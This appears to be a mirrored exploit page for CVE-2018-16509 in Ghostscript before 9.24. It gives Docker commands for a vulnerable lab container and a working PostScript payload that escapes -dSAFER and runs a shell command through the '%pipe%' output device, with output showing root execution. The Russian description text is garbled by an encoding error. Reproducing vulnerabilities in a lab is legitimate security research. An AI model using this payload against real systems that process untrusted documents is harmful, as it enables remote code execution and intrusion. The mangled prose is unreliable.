## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RHPCO-CVE-2018-16509
# CVE-2018-16509 ΠΠ΅ΡΠΎΡΠ½ΠΈΡΠ° Docker
"ΠΠ±Π½Π°ΡΡΠΆΠ΅Π½Π° ΠΏΡΠΎΠ±Π»Π΅ΠΌΠ° Π² Artifex Ghostscript Π΄ΠΎ Π²Π΅ΡΡΠΈΠΈ 9.24. ΠΠ΅ΠΏΡΠ°Π²ΠΈΠ»ΡΠ½Π°Ρ ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° "Π²ΠΎΡΡΡΠ°Π½ΠΎΠ²Π»Π΅Π½ΠΈΡ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ" ΠΏΡΠΈ ΠΎΠ±ΡΠ°Π±ΠΎΡΠΊΠ΅ ΠΈΡΠΊΠ»ΡΡΠ΅Π½ΠΈΠΉ /invalidaccess ΠΌΠΎΠΆΠ΅Ρ Π±ΡΡΡ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½Π° Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌΠΈ, ΡΠΏΠΎΡΠΎΠ±Π½ΡΠΌΠΈ ΠΏΡΠ΅Π΄ΠΎΡΡΠ°Π²ΠΈΡΡ ΡΠΏΠ΅ΡΠΈΠ°Π»ΡΠ½ΠΎ ΡΠΎΠ·Π΄Π°Π½Π½ΡΠΉ PostScript, Π΄Π»Ρ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠ΄Π° Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΠΈΠ½ΡΡΡΡΠΊΡΠΈΠΈ "pipe"." https://nvd.nist.gov/vuln/detail/CVE-2018-16509 https://access.redhat.com/security/cve/cve-2018-16509
## Π‘Π±ΠΎΡΠΊΠ°
root@kitploit:~
docker build -t cve-2018-16509:latest .
## ΠΠ°ΠΏΡΡΠΊ + ΠΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅
root@kitploit:~
docker exec -it `docker run -d cve-2018-16509:latest` bash
## ΠΠ΅ΡΡΠΈΡ
root@kitploit:~
[root@400498314b62 ~]# gs -v
GPL Ghostscript 9.22 (2017-10-04)
Copyright (C) 2017 Artifex Software, Inc. All rights reserved.
## ΠΠΊΡΠΏΠ»ΠΎΠΉΡ
root@kitploit:~
gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=0(root) gid=0(root) groups=0(root)
[root@400498314b62 ~]#